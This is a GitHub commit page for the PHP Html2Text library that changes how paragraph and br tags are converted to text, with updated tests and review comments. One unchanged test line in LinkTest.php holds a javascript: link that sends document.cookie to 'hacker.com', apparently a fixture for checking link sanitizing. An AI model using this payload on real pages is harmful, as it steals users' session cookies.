Skip to content

Commit

Permalink
Treat all paragraph content equally (Fixes #7)
Browse files Browse the repository at this point in the history
The content of paragraph tags should be treated equally. That is to say,
whitespace within the tag (newlines and spaces) should be collapsed before
the tag is processed.
  • Loading branch information
andrewnicols authored and mtibben committed Oct 13, 2015
1 parent 731f734 commit 0d40933
Show file tree
Hide file tree
Showing 6 changed files with 74 additions and 9 deletions.
17 changes: 13 additions & 4 deletions src/Html2Text.php
Expand Up @@ -50,8 +50,6 @@ class Html2Text
'/<head[^>]*>.*?<\/head>/i', // <head>
'/<script[^>]*>.*?<\/script>/i', // <script>s -- which strip_tags supposedly has problems with
'/<style[^>]*>.*?<\/style>/i', // <style>s -- which strip_tags supposedly has problems with
'/<p[^>]*>/i', // <P>
'/<br[^>]*>/i', // <br>
'/<i[^>]*>(.*?)<\/i>/i', // <i>
'/<em[^>]*>(.*?)<\/em>/i', // <em>
'/(<ul[^>]*>|<\/ul>)/i', // <ul> and </ul>
Expand Down Expand Up @@ -82,8 +80,6 @@ class Html2Text
'', // <head>
'', // <script>s -- which strip_tags supposedly has problems with
'', // <style>s -- which strip_tags supposedly has problems with
"\n\n", // <P>
"\n", // <br>
'_\\1_', // <i>
'_\\1_', // <em>
"\n\n", // <ul> and </ul>
Expand Down Expand Up @@ -137,6 +133,8 @@ class Html2Text
*/
protected $callbackSearch = array(
'/<(h)[123456]( [^>]*)?>(.*?)<\/h[123456]>/i', // h1 - h6
'/[ ]*<(p)( [^>]*)?>(.*?)<\/p>[ ]*/si', // <p> with surrounding whitespace.
'/<(br)[^>]*>[ ]*/i', // <br> with leading whitespace after the newline.
'/<(b)( [^>]*)?>(.*?)<\/b>/i', // <b>
'/<(strong)( [^>]*)?>(.*?)<\/strong>/i', // <strong>
'/<(th)( [^>]*)?>(.*?)<\/th>/i', // <th> and </th>
Expand Down Expand Up @@ -511,6 +509,17 @@ protected function convertBlockquotes(&$text)
protected function pregCallback($matches)
{
switch (strtolower($matches[1])) {
case 'p':
// Replace newlines with spaces.
$para = str_replace("\n", " ", $matches[3]);

// Trim trailing and leading whitespace within the tag.
$para = trim($para);

// Add trailing newlines for this para.
return "\n" . $para . "\n";

This comment has been minimized.

Copy link
@voku

voku Oct 13, 2015

Some of my "real-world" tests (e.g. https://github.com/voku/html2text/blob/master/tests/test6Html.html) failed with this change, so I have to change "\n" into "\n\n":

-> return "\n\n" . $para . "\n\n";

This comment has been minimized.

Copy link
@mtibben

mtibben Oct 13, 2015

Owner

Hey @voku, I'd love to get some more varied test cases. Can you open a PR?

case 'br':
return "\n";
case 'b':
case 'strong':
return $this->toupper($matches[3]);
Expand Down
51 changes: 51 additions & 0 deletions test/BasicTest.php
Expand Up @@ -19,6 +19,57 @@ public function basicDataProvider() {
'html' => '0',
'expected' => '0',
),
'Paragraph with whitespace wrapping it' => array(
'html' => 'Foo <p>Bar</p> Baz',
'expected' => "Foo\nBar\nBaz",
),
'Paragraph text with linebreak flat' => array(
'html' => "<p>Foo<br/>Bar</p>",
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted with newline' => array(
'html' => <<<EOT
<p>
Foo<br/>
Bar
</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted whth newline, but without whitespace' => array(
'html' => <<<EOT
<p>Foo<br/>
Bar</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
'Paragraph text with linebreak formatted with indentation' => array(
'html' => <<<EOT
<p>
Foo<br/>Bar
</p>
EOT
,
'expected' => <<<EOT
Foo
Bar
EOT
),
);
}

Expand Down
4 changes: 3 additions & 1 deletion test/BlockquoteTest.php
Expand Up @@ -22,11 +22,12 @@ public function blockquoteDataProvider()
EOT
,
'expected' => <<<EOT
Before
Before
> Foo bar baz HTML symbols &
After
EOT
,
),
Expand All @@ -53,6 +54,7 @@ public function blockquoteDataProvider()
> ZHU: Her name is Jolene. She’s nice. I like her.
I think the audience is winning.  - Derek
EOF
),
);
Expand Down
1 change: 1 addition & 0 deletions test/HeaderTest.php
Expand Up @@ -14,6 +14,7 @@ public function testToUpper()
WILL BE UTF-8 (ÄÖÜÈÉИЛČΛ) UPPERCASED
Will remain lowercased
EOT;

$html2text = new Html2Text($html);
Expand Down
7 changes: 4 additions & 3 deletions test/LinkTest.php
Expand Up @@ -69,12 +69,13 @@ public function testDoLinksInHtml()
EOT;

$expected =<<<EOT
Link text
Link text
Link text [http://example.com]
Link text [http://example.com]
Link text
[http://example.com]
EOT;

$html2text = new Html2Text($html);
Expand Down Expand Up @@ -124,7 +125,7 @@ public function testInvertedBoldLinks()

$this->assertEquals($expected, $html2text->getText());
}

public function testJavascriptSanitizing()
{
$html = '<a href="javascript:window.open(\'http://hacker.com?cookie=\'+document.cookie)">Link text</a>';
Expand Down
3 changes: 2 additions & 1 deletion test/PreTest.php
Expand Up @@ -20,13 +20,14 @@ public function testPre()
EOT;

$expected =<<<'EOT'
Before
Before
Foo bar baz
HTML symbols &
After
EOT;

$html2text = new Html2Text($html);
Expand Down

0 comments on commit 0d40933

Please sign in to comment.